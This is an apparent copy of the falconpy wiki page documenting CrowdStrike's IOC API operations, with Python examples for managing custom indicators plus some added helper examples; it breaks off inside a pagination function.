Ioc - CrowdStrike/falconpy GitHub Wiki
This service collection has code examples posted to the repository.
Operation ID | Description |
---|---|
indicator_aggregate | Get Indicators aggregates as specified via json in the request body. |
indicator_combined | Get Combined for Indicators. |
action_get | Get Actions by ids. |
get_indicators_report | Launch an indicators report creation job |
indicator_get | Get Indicators by ids. |
indicator_create | Create Indicators. |
indicator_delete | Delete Indicators by ids. |
indicator_update | Update Indicators. |
action_query | Query Actions. |
indicator_search | Search for Indicators. |
ioc_type_query | Query IOC Types. |
platform_query | Query Platforms. |
severity_query | Query Severities. |
devices_count_legacy | Number of hosts in your customer account that have observed a given custom IOC |
devices_count | Number of hosts in your customer account that have observed a given custom IOC |
devices_ran_on_legacy | Find hosts that have observed a given custom IOC. For details about those hosts, use GET /devices/entities/devices/v1 |
devices_ran_on | Find hosts that have observed a given custom IOC. For details about those hosts, use GET /devices/entities/devices/v1 |
| | Search for processes associated with a custom IOC (Deprecated) |
| | Search for processes associated with a custom IOC |
| | For the provided ProcessID retrieve the process details |
WARNING

`client_id` and `client_secret` are keyword arguments that contain your CrowdStrike API credentials. Please note that all examples below do not hard code these values. (These values are ingested as strings.) CrowdStrike does not recommend hard coding API credentials or customer identifiers within source code.
Get Indicators aggregates as specified via json in the request body.
indicator_aggregate

Method | Route |
---|---|
| | /iocs/aggregates/indicators/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
body | | | body | list of dictionaries | Full body payload in JSON format. |
date_ranges | | | body | list of dictionaries | Applies to date_range aggregations. Example: [ { "from": "2016-05-28T09:00:31Z", "to": "2016-05-30T09:00:31Z" }, { "from": "2016-06-01T09:00:31Z", "to": "2016-06-10T09:00:31Z" } ] |
exclude | | | body | string | Elements to exclude. |
field | | | body | string | The field on which to compute the aggregation. |
filter | | | body | string | FQL syntax formatted string to use to filter the results. |
from | | | body | integer | Starting position. |
include | | | body | string | Elements to include. |
interval | | | body | string | Time interval for date histogram aggregations. Valid values include: |
max_doc_count | | | body | integer | Only return buckets if values are less than or equal to the value here. |
min_doc_count | | | body | integer | Only return buckets if values are greater than or equal to the value here. |
missing | | | body | string | Missing is the value to be used when the aggregation field is missing from the object. In other words, the missing parameter defines how documents that are missing a value should be treated. By default they will be ignored, but it is also possible to treat them as if they had a value. |
name | | | body | string | Name of the aggregate query, as chosen by the user. Used to identify the results returned to you. |
q | | | body | string | Full text search across all metadata fields. |
ranges | | | body | list of dictionaries | Applies to range aggregations. Ranges values will depend on field. For example, if max_severity is used, ranges might look like: [ { "From": 0, "To": 70 }, { "From": 70, "To": 100 } ] |
size | | | body | integer | The max number of term buckets to be returned. |
sub_aggregates | | | body | list of dictionaries | A nested aggregation, such as: [ { "name": "max_first_behavior", "type": "max", "field": "first_behavior" } ] There is a maximum of 3 nested aggregations per request. |
sort | | | body | string | FQL syntax string to sort bucket results. asc and desc using \| format. Example: _count\|desc |
time_zone | | | body | string | Time zone for bucket results. |
type | | | body | string | Type of aggregation. Valid values include: |

```python
from falconpy.ioc import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

date_range = {
    "from": "string",
    "to": "string"
}

search_range = {
    "From": integer,
    "To": integer
}

# "from" is a reserved word in Python and cannot be written as a bare keyword
# argument, so it is unpacked from a dictionary instead.
response = falcon.indicator_aggregate(date_ranges=[date_range],
                                      exclude="string",
                                      field="string",
                                      filter="string",
                                      include="string",
                                      interval="string",
                                      max_doc_count=integer,
                                      min_doc_count=integer,
                                      missing="string",
                                      name="string",
                                      q="string",
                                      ranges=[search_range],
                                      size=integer,
                                      sort="string",
                                      time_zone="string",
                                      type="string",
                                      **{"from": integer}
                                      )
print(response)
```

```python
from falconpy import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

date_range = {
    "from": "string",
    "to": "string"
}

search_range = {
    "From": integer,
    "To": integer
}

# "from" is a reserved word in Python and cannot be written as a bare keyword
# argument, so it is unpacked from a dictionary instead.
response = falcon.indicator_aggregate_v1(date_ranges=[date_range],
                                         exclude="string",
                                         field="string",
                                         filter="string",
                                         include="string",
                                         interval="string",
                                         max_doc_count=integer,
                                         min_doc_count=integer,
                                         missing="string",
                                         name="string",
                                         q="string",
                                         ranges=[search_range],
                                         size=integer,
                                         sort="string",
                                         time_zone="string",
                                         type="string",
                                         **{"from": integer}
                                         )
print(response)
```

```python
from falconpy import APIHarnessV2

falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

BODY = {
    "date_ranges": [
        {
            "from": "string",
            "to": "string"
        }
    ],
    "exclude": "string",
    "field": "string",
    "filter": "string",
    "from": integer,
    "include": "string",
    "interval": "string",
    "max_doc_count": integer,
    "min_doc_count": integer,
    "missing": "string",
    "name": "string",
    "q": "string",
    "ranges": [
        {
            "From": integer,
            "To": integer
        }
    ],
    "size": integer,
    "sort": "string",
    "sub_aggregates": [
        None
    ],
    "time_zone": "string",
    "type": "string"
}

response = falcon.command("indicator_aggregate_v1",
                          filter="string",
                          from_parent=boolean,
                          body=BODY
                          )
print(response)
```
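As an added example (not code from the falconpy wiki or the SDK), the following builds one terms-type aggregate query for indicator_aggregate, enforcing the three-sub-aggregation limit and the field|asc / field|desc sort form from the table above, and reduces the returned buckets to a count per indicator type. The "terms" aggregation type, the bucket shape (resources[].buckets[].key/count) and the FakeIOC stand-in client are assumptions of this example, not facts stated on the page.

```python
"""Added example: build an indicator_aggregate request and summarise its buckets.

Assumptions (not stated on the wiki page): the aggregation type "terms" is
accepted, the response carries buckets at body["resources"][i]["buckets"]
with "key"/"count" entries, and the client is anything exposing
indicator_aggregate(body=...).
"""
from typing import Dict, List, Optional

MAX_SUB_AGGREGATES = 3  # limit stated in the sub_aggregates row of the table


def build_terms_aggregate(name: str, field: str, *, size: int = 10,
                          fql_filter: Optional[str] = None,
                          date_ranges: Optional[List[Dict[str, str]]] = None,
                          sub_aggregates: Optional[List[dict]] = None,
                          sort: str = "_count|desc") -> dict:
    """Return one aggregate query dictionary in the shape the body expects.

    The page documents the body as a list of such dictionaries, so a caller
    passes [build_terms_aggregate(...)] as the body.
    """
    if sub_aggregates and len(sub_aggregates) > MAX_SUB_AGGREGATES:
        raise ValueError(f"at most {MAX_SUB_AGGREGATES} nested aggregations per request")
    if "|" not in sort or sort.rsplit("|", 1)[1] not in ("asc", "desc"):
        raise ValueError("sort must use the <field>|asc or <field>|desc form")
    query = {"name": name, "type": "terms", "field": field, "size": size, "sort": sort}
    if fql_filter:
        query["filter"] = fql_filter
    if date_ranges:
        for rng in date_ranges:
            if set(rng) != {"from", "to"}:
                raise ValueError("each date range needs exactly 'from' and 'to'")
        query["date_ranges"] = date_ranges
    if sub_aggregates:
        query["sub_aggregates"] = sub_aggregates
    return query


def bucket_counts(response: dict, name: str) -> Dict[str, int]:
    """Flatten the named aggregation's buckets into {key: count}.

    A non-200 status is raised rather than silently treated as "no buckets",
    so an auth or quota failure is not mistaken for an empty tenant.
    """
    if response.get("status_code") != 200:
        raise RuntimeError(f"aggregate call failed: {response.get('status_code')} "
                           f"{response.get('body', {}).get('errors')}")
    for agg in response.get("body", {}).get("resources", []):
        if agg.get("name") == name:
            return {b["key"]: int(b["count"]) for b in agg.get("buckets", [])}
    return {}


def indicators_by_type(falcon, fql_filter: Optional[str] = None) -> Dict[str, int]:
    """Ask the IOC service how many custom indicators exist per IOC type."""
    body = [build_terms_aggregate("by_type", "type", size=20, fql_filter=fql_filter)]
    return bucket_counts(falcon.indicator_aggregate(body=body), "by_type")


class FakeIOC:
    """Constructed stand-in for the SDK client so the example runs offline."""

    def indicator_aggregate(self, body=None, **kwargs):
        assert isinstance(body, list) and body[0]["type"] == "terms"
        return {"status_code": 200, "headers": {},
                "body": {"resources": [{"name": body[0]["name"],
                                        "buckets": [{"key": "domain", "count": 12},
                                                    {"key": "sha256", "count": 7}]}]}}


if __name__ == "__main__":
    print(indicators_by_type(FakeIOC(), fql_filter="applied_globally:true"))
```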
Back to Table of Contents
Get Combined for Indicators.
indicator_combined

Method | Route |
---|---|
| | /iocs/combined/indicator/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
after | | | query | string | A pagination token used with the limit parameter to manage pagination of results. On your first request, don't provide an after token. On subsequent requests, provide the after token from the previous response to continue from that place in the results. To access more than 10k indicators, use the after parameter instead of offset. |
filter | | | query | string | FQL Syntax formatted filter that should be used to limit the results. Available filters: |
from_parent | | | query | boolean | The filter for returning either only indicators for the request customer or its MSSP parents. |
limit | | | query | integer | Maximum number of results to return. |
offset | | | query | integer | The offset to start retrieving records from. Offset and After params are mutually exclusive. If none provided then scrolling will be used by default. To access more than 10k iocs, use the after parameter instead of offset. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |
sort | | | query | string | FQL Syntax formatted sort filter. |

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.indicator_combined(filter="string",
                                     offset=integer,
                                     limit=integer,
                                     sort="string",
                                     after="string",
                                     from_parent=boolean
                                     )
print(response)
```

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.indicator_combined_v1(filter="string",
                                        offset=integer,
                                        limit=integer,
                                        sort="string",
                                        after="string",
                                        from_parent=boolean
                                        )
print(response)
```

```python
from falconpy import APIHarnessV2

# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

response = falcon.command("indicator_combined_v1",
                          filter="string",
                          offset=integer,
                          limit=integer,
                          sort="string",
                          after="string",
                          from_parent=boolean
                          )
print(response)
```
Back to Table of Contents
Get Actions by ids.
action_get

Method | Route |
---|---|
| | /iocs/entities/actions/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
ids | | | query | string or list of strings | The ids of the actions to retrieve. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |

```python
from falconpy.ioc import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

id_list = 'ID1,ID2,ID3'  # Can also pass a list here: ['ID1', 'ID2', 'ID3']

response = falcon.action_get(ids=id_list)
print(response)
```

```python
from falconpy import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

id_list = 'ID1,ID2,ID3'  # Can also pass a list here: ['ID1', 'ID2', 'ID3']

response = falcon.action_get_v1(ids=id_list)
print(response)
```

```python
from falconpy import APIHarnessV2

falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

id_list = 'ID1,ID2,ID3'  # Can also pass a list here: ['ID1', 'ID2', 'ID3']

response = falcon.command("action_get_v1", ids=id_list)
print(response)
```
Back to Table of Contents
Launch an indicators report creation job
get_indicators_report

Method | Route |
---|---|
| | /iocs/entities/indicators-reports/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
body | | | body | dictionary | Full body payload in JSON format. |
filter | | | body | string | FQL formatted string specifying the search filter. Overridden if search keyword is provided. |
from_parent | | | body | boolean | Return results for the parent only. |
query | | | body | string | FQL formatted string specifying the search query. Overridden if search keyword is provided. |
report_format | | | body | string | Format of the report. |
search | | | body | dictionary | Search parameters provided as a dictionary. Overrides values provided in the filter, query and sort keywords. |
sort | | | body | string | FQL formatted string specifying the sort. Overridden if search keyword is provided. |

```python
from falconpy.ioc import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.get_indicators_report(filter="string",
                                        query="string",
                                        from_parent=boolean,
                                        report_format="string",
                                        sort="string"
                                        )
print(response)
```

```python
from falconpy import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.GetIndicatorsReport(filter="string",
                                      query="string",
                                      from_parent=boolean,
                                      report_format="string",
                                      sort="string"
                                      )
print(response)
```

```python
from falconpy import APIHarnessV2

falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

BODY = {
    "from_parent": boolean,
    "report_format": "string",
    "search": {
        "filter": "string",
        "query": "string",
        "sort": "string"
    }
}

response = falcon.command("GetIndicatorsReport", body=BODY)
print(response)
```
Back to Table of Contents
Get Indicators by ids.
indicator_get

Method | Route |
---|---|
| | /iocs/entities/indicators/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
ids | | | query | string or list of strings | The ids of the Indicators to retrieve. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

id_list = 'ID1,ID2,ID3'  # Can also pass a list here: ['ID1', 'ID2', 'ID3']

response = falcon.indicator_get(ids=id_list)
print(response)
```

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

id_list = 'ID1,ID2,ID3'  # Can also pass a list here: ['ID1', 'ID2', 'ID3']

response = falcon.indicator_get_v1(ids=id_list)
print(response)
```

```python
from falconpy import APIHarnessV2

# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

id_list = 'ID1,ID2,ID3'  # Can also pass a list here: ['ID1', 'ID2', 'ID3']

response = falcon.command("indicator_get_v1", ids=id_list)
print(response)
```
Back to Table of Contents
Create Indicators.
indicator_create

Method | Route |
---|---|
| | /iocs/entities/indicators/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
action | | | body | string | Default action for IOC. |
applied_globally | | | body | boolean | Flag indicating this IOC is applied globally. |
body | | | body | dictionary | Full body payload in JSON format. |
comment | | | body | string | IOC comment. |
description | | | body | string | IOC description. |
expiration | | | body | string | UTC formatted date string. |
filename | | | body | string | Filename to use for the metadata dictionary. |
host_groups | | | body | string or list of strings | List of host groups this IOC applies to. |
ignore_warnings | | | query | boolean | Flag to indicate that warnings are ignored. |
indicators | | | body | list of dictionaries | List of indicators to create. Overrides other keywords excluding body. Allows for the creation of multiple indicators at once. |
metadata | | | body | dictionary | Dictionary containing the filename for the IOC. Not required if the filename keyword is used. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |
platforms | | | body | string or list of strings | Platforms this IOC impacts. |
retrodetects | | | query | boolean | Flag to indicate whether to submit retrodetects. |
severity | | | body | string | IOC severity. |
source | | | body | string | IOC source. |
tags | | | body | string or list of strings | IOC tags. |
type | | | body | string | IOC type. |
value | | | body | string | String representation of the IOC. |

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

host_group_list = 'HG1,HG2,HG3'  # Can also pass a list here: ['HG1', 'HG2', 'HG3']
platform_list = 'OS1,OS2,OS3'  # Can also pass a list here: ['OS1', 'OS2', 'OS3']
tag_list = 'TAG1,TAG2,TAG3'  # Can also pass a list here: ['TAG1', 'TAG2', 'TAG3']

response = falcon.indicator_create(action="string",
                                   applied_globally=boolean,
                                   comment="string",
                                   description="string",
                                   expiration="string",
                                   filename="string",
                                   host_groups=host_group_list,
                                   ignore_warnings=boolean,
                                   platforms=platform_list,
                                   retrodetects=boolean,
                                   severity="string",
                                   source="string",
                                   tags=tag_list,
                                   type="string",
                                   value="string"
                                   )
print(response)
```

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

host_group_list = 'HG1,HG2,HG3'  # Can also pass a list here: ['HG1', 'HG2', 'HG3']
platform_list = 'OS1,OS2,OS3'  # Can also pass a list here: ['OS1', 'OS2', 'OS3']
tag_list = 'TAG1,TAG2,TAG3'  # Can also pass a list here: ['TAG1', 'TAG2', 'TAG3']

response = falcon.indicator_create_v1(action="string",
                                      applied_globally=boolean,
                                      comment="string",
                                      description="string",
                                      expiration="string",
                                      filename="string",
                                      host_groups=host_group_list,
                                      ignore_warnings=boolean,
                                      platforms=platform_list,
                                      retrodetects=boolean,
                                      severity="string",
                                      source="string",
                                      tags=tag_list,
                                      type="string",
                                      value="string"
                                      )
print(response)
```

```python
from falconpy import APIHarnessV2

# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

host_group_list = ['HG1', 'HG2', 'HG3']
platform_list = ['OS1', 'OS2', 'OS3']
tag_list = ['TAG1', 'TAG2', 'TAG3']

BODY = {
    "comment": "string",
    "indicators": [
        {
            "action": "string",
            "applied_globally": boolean,
            "description": "string",
            "expiration": "2021-10-22T10:40:39.372Z",
            "host_groups": host_group_list,
            "metadata": {
                "filename": "string"
            },
            "mobile_action": "string",
            "platforms": platform_list,
            "severity": "string",
            "source": "string",
            "tags": tag_list,
            "type": "string",
            "value": "string"
        }
    ]
}

response = falcon.command("indicator_create_v1",
                          retrodetects=boolean,
                          ignore_warnings=boolean,
                          body=BODY
                          )
print(response)
```
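As an added example (not code from the falconpy wiki or the SDK) of what the indicators list for indicator_create looks like when built from real input: a constructed CSV of observations is turned into de-duplicated indicator dictionaries with a UTC expiration in the form the table asks for, and the client is built from environment variables rather than hard-coded credentials. The variable names FALCON_CLIENT_ID and FALCON_CLIENT_SECRET, the "detect" action, the "ir-case" source and the 30-day window are this example's own assumptions.

```python
"""Added example: assemble the `indicators` list for indicator_create.

Assumptions beyond the wiki page: the environment variable names, the
"detect" action, the "ir-case" source and the expiration window are choices
made here; the CSV below is constructed sample input, not real indicators.
"""
import csv
import io
import os
from datetime import datetime, timedelta, timezone
from typing import List, Optional

# Constructed sample input: one observation per line; the third line is a
# duplicate of the first so the de-duplication path is exercised.
SAMPLE_CSV = """type,value,severity,filename
sha256,E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,high,dropper.exe
domain,bad.example,medium,
sha256,e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855,high,dropper.exe
"""


def utc_expiration(days: int, now: Optional[datetime] = None) -> str:
    """UTC timestamp in the 2021-10-22T10:40:39.372Z style shown on the page."""
    now = now or datetime.now(timezone.utc)
    when = now.astimezone(timezone.utc) + timedelta(days=days)
    return when.strftime("%Y-%m-%dT%H:%M:%S.") + f"{when.microsecond // 1000:03d}Z"


def build_indicators(csv_text: str, *, platforms: List[str], host_groups: List[str],
                     days_valid: int = 30, action: str = "detect", source: str = "ir-case",
                     now: Optional[datetime] = None) -> List[dict]:
    """Turn CSV rows into indicator dictionaries, dropping exact duplicates.

    Hash values are lower-cased before comparison so the same hash in two
    cases is submitted once. Rows with a filename get metadata.filename, the
    dictionary the table documents for hash indicators; domains omit it.
    """
    seen = set()
    indicators = []
    expiration = utc_expiration(days_valid, now)
    for row in csv.DictReader(io.StringIO(csv_text)):
        ioc_type, value = row["type"].strip().lower(), row["value"].strip()
        if not value:
            continue
        if ioc_type in ("sha256", "md5"):
            value = value.lower()
        key = (ioc_type, value)
        if key in seen:
            continue
        seen.add(key)
        item = {"type": ioc_type, "value": value, "action": action,
                "severity": row["severity"].strip().lower(), "source": source,
                "platforms": platforms, "host_groups": host_groups,
                "applied_globally": False, "expiration": expiration}
        if row.get("filename"):
            item["metadata"] = {"filename": row["filename"].strip()}
        indicators.append(item)
    return indicators


def make_client():
    """Build the service class from the environment; credentials are never in source."""
    from falconpy import IOC  # imported here so the helpers above run without the SDK
    return IOC(client_id=os.environ["FALCON_CLIENT_ID"],
               client_secret=os.environ["FALCON_CLIENT_SECRET"])


def create_indicators(falcon, indicators: List[dict], comment: str) -> dict:
    """Submit one batch; retrodetects and ignore_warnings are query parameters."""
    return falcon.indicator_create(indicators=indicators, comment=comment,
                                   retrodetects=False, ignore_warnings=False)


if __name__ == "__main__":
    batch = build_indicators(SAMPLE_CSV, platforms=["windows"], host_groups=["HG1"])
    print(create_indicators(make_client(), batch, "IR case indicators"))
```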
Back to Table of Contents
Delete Indicators by ids or a filter.
indicator_delete

Method | Route |
---|---|
| | /iocs/entities/indicators/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
filter | | | query | string | FQL Syntax formatted filter that should be used to delete indicators in bulk. If both filter and ids are provided, then filter takes precedence and ids is ignored. |
from_parent | | | query | boolean | Limit action to IOCs originating from the MSSP parent. |
ids | | | query | string or list of strings | The ids of the Indicators to delete. If both filter and ids are provided, then filter takes precedence and ids is ignored. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

id_list = 'ID1,ID2,ID3'  # Can also pass a list here: ['ID1', 'ID2', 'ID3']

response = falcon.indicator_delete(filter="string",
                                   from_parent=boolean,
                                   comment="string",
                                   ids=id_list
                                   )
print(response)
```

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

id_list = 'ID1,ID2,ID3'  # Can also pass a list here: ['ID1', 'ID2', 'ID3']

response = falcon.indicator_delete_v1(filter="string",
                                      from_parent=boolean,
                                      comment="string",
                                      ids=id_list
                                      )
print(response)
```

```python
from falconpy import APIHarnessV2

# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

id_list = 'ID1,ID2,ID3'  # Can also pass a list here: ['ID1', 'ID2', 'ID3']

response = falcon.command("indicator_delete_v1",
                          filter="string",
                          from_parent=boolean,
                          comment="string",
                          ids=id_list
                          )
print(response)
```
Back to Table of Contents
Update Indicators.
indicator_update

Method | Route |
---|---|
| | /iocs/entities/indicators/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
action | | | body | string | Default action for IOC. |
applied_globally | | | body | boolean | Flag indicating this IOC is applied globally. |
body | | | body | dictionary | Full body payload in JSON format. |
bulk_update | | | body | dictionary | Dictionary containing the indicator update in JSON format. Not necessary when using other keywords. |
comment | | | body | string | IOC comment. |
description | | | body | string | IOC description. |
expiration | | | body | string | UTC formatted date string. |
filename | | | body | string | Filename to use for the metadata dictionary. |
from_parent | | | body | boolean | Return results for the parent only. |
host_groups | | | body | string or list of strings | List of host groups this IOC applies to. |
id | | | body | string | The Indicator ID to be updated. At least one ID must be specified using this keyword, or as part of the indicators list using the indicators keyword. |
ignore_warnings | | | query | boolean | Flag to indicate that warnings are ignored. |
indicators | | | body | list of dictionaries | List of indicators to update. Overrides other keywords excluding body. Allows for the update of multiple indicators at once. |
metadata | | | body | dictionary | Dictionary containing the filename for the IOC. Not required if the filename keyword is used. |
mobile_action | | | body | string | Mobile action to perform. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |
platforms | | | body | string or list of strings | Platforms this IOC impacts. |
retrodetects | | | query | boolean | Flag to indicate whether to submit retrodetects. |
severity | | | body | string | IOC severity. |
source | | | body | string | IOC source. |
tags | | | body | string or list of strings | IOC tags. |
type | | | body | string | IOC type. |
value | | | body | string | String representation of the IOC. |

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

host_group_list = 'HG1,HG2,HG3'  # Can also pass a list here: ['HG1', 'HG2', 'HG3']
platform_list = 'OS1,OS2,OS3'  # Can also pass a list here: ['OS1', 'OS2', 'OS3']
tag_list = 'TAG1,TAG2,TAG3'  # Can also pass a list here: ['TAG1', 'TAG2', 'TAG3']

response = falcon.indicator_update(action="string",
                                   applied_globally=boolean,
                                   comment="string",
                                   description="string",
                                   expiration="string",
                                   filename="string",
                                   from_parent=boolean,
                                   host_groups=host_group_list,
                                   ignore_warnings=boolean,
                                   mobile_action="string",
                                   platforms=platform_list,
                                   retrodetects=boolean,
                                   severity="string",
                                   source="string",
                                   tags=tag_list,
                                   type="string",
                                   value="string"
                                   )
print(response)
```

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

host_group_list = 'HG1,HG2,HG3'  # Can also pass a list here: ['HG1', 'HG2', 'HG3']
platform_list = 'OS1,OS2,OS3'  # Can also pass a list here: ['OS1', 'OS2', 'OS3']
tag_list = 'TAG1,TAG2,TAG3'  # Can also pass a list here: ['TAG1', 'TAG2', 'TAG3']

response = falcon.indicator_update_v1(action="string",
                                      applied_globally=boolean,
                                      comment="string",
                                      description="string",
                                      expiration="string",
                                      filename="string",
                                      from_parent=boolean,
                                      host_groups=host_group_list,
                                      ignore_warnings=boolean,
                                      mobile_action="string",
                                      platforms=platform_list,
                                      retrodetects=boolean,
                                      severity="string",
                                      source="string",
                                      tags=tag_list,
                                      type="string",
                                      value="string"
                                      )
print(response)
```

```python
from falconpy import APIHarnessV2

# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

host_group_list = ['HG1', 'HG2', 'HG3']
platform_list = ['OS1', 'OS2', 'OS3']
tag_list = ['TAG1', 'TAG2', 'TAG3']

BODY = {
    "bulk_update": {
        "action": "string",
        "applied_globally": boolean,
        "description": "string",
        "expiration": "2021-10-22T11:03:16.123Z",
        "filter": "string",
        "from_parent": boolean,
        "host_groups": host_group_list,
        "mobile_action": "string",
        "platforms": platform_list,
        "severity": "string",
        "source": "string",
        "tags": tag_list
    },
    "comment": "string",
    "indicators": [
        {
            "action": "string",
            "applied_globally": boolean,
            "description": "string",
            "expiration": "2021-10-22T11:03:16.123Z",
            "host_groups": host_group_list,
            "id": "string",
            "metadata": {
                "filename": "string"
            },
            "mobile_action": "string",
            "platforms": platform_list,
            "severity": "string",
            "source": "string",
            "tags": tag_list
        }
    ]
}

response = falcon.command("indicator_update_v1",
                          ignore_warnings=boolean,
                          retrodetects=boolean,
                          body=BODY
                          )
print(response)
```
Back to Table of Contents
Query Actions.
action_query

Method | Route |
---|---|
| | /iocs/queries/actions/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
limit | | | query | integer | Maximum number of results to return. |
offset | | | query | string | The offset to start retrieving records from. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |

```python
from falconpy.ioc import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.action_query(offset="string", limit=integer)
print(response)
```

```python
from falconpy import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.action_query_v1(offset="string", limit=integer)
print(response)
```

```python
from falconpy import APIHarnessV2

falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

response = falcon.command("action_query_v1", offset="string", limit=integer)
print(response)
```
Back to Table of Contents
Search for Indicators.
indicator_search

Method | Route |
---|---|
| | /iocs/queries/indicators/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
after | | | query | string | A pagination token used with the limit parameter to manage pagination of results. On your first request, don't provide an after token. On subsequent requests, provide the after token from the previous response to continue from that place in the results. To access more than 10k indicators, use the after parameter instead of offset. |
filter | | | query | string | FQL Syntax formatted filter that should be used to limit the results. Available filters: |
from_parent | | | query | boolean | Return results for the parent only. |
limit | | | query | integer | Maximum number of results to return. |
offset | | | query | integer | The offset to start retrieving records from. Offset and After params are mutually exclusive. If none provided then scrolling will be used by default. To access more than 10k iocs, use the after parameter instead of offset. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |
sort | | | query | string | FQL Syntax formatted sort filter. |

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.indicator_search(filter="string",
                                   from_parent=boolean,
                                   offset=integer,
                                   limit=integer,
                                   sort="string",
                                   after="string"
                                   )
print(response)
```

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.indicator_search_v1(filter="string",
                                      from_parent=boolean,
                                      offset=integer,
                                      limit=integer,
                                      sort="string",
                                      after="string"
                                      )
print(response)
```

```python
from falconpy import APIHarnessV2

# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

response = falcon.command("indicator_search_v1",
                          filter="string",
                          from_parent=boolean,
                          offset=integer,
                          limit=integer,
                          sort="string",
                          after="string"
                          )
print(response)
```
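Both indicator_combined and indicator_search say to page with the after token rather than offset once a tenant holds more than 10k indicators; as an added example (not code from the falconpy wiki or the SDK), this walks the whole indicator set that way against a constructed stand-in client and never mixes the two parameters. It assumes the next token is returned at body["meta"]["pagination"]["after"] and is absent on the last page, and that modified_on is an accepted sort field; the FakeIOC class and its records are constructed for the example.

```python
"""Added example: exhaustive, offset-free pagination of custom indicators.

Assumptions (not stated on the wiki page): the next token lives at
body["meta"]["pagination"]["after"] and is missing on the final page, the
client exposes indicator_combined(**kwargs), and modified_on is sortable.
"""
from typing import Dict, Iterator, Optional


def iter_indicators(falcon, fql_filter: Optional[str] = None, limit: int = 500,
                    sort: str = "modified_on|desc", max_pages: int = 10_000) -> Iterator[dict]:
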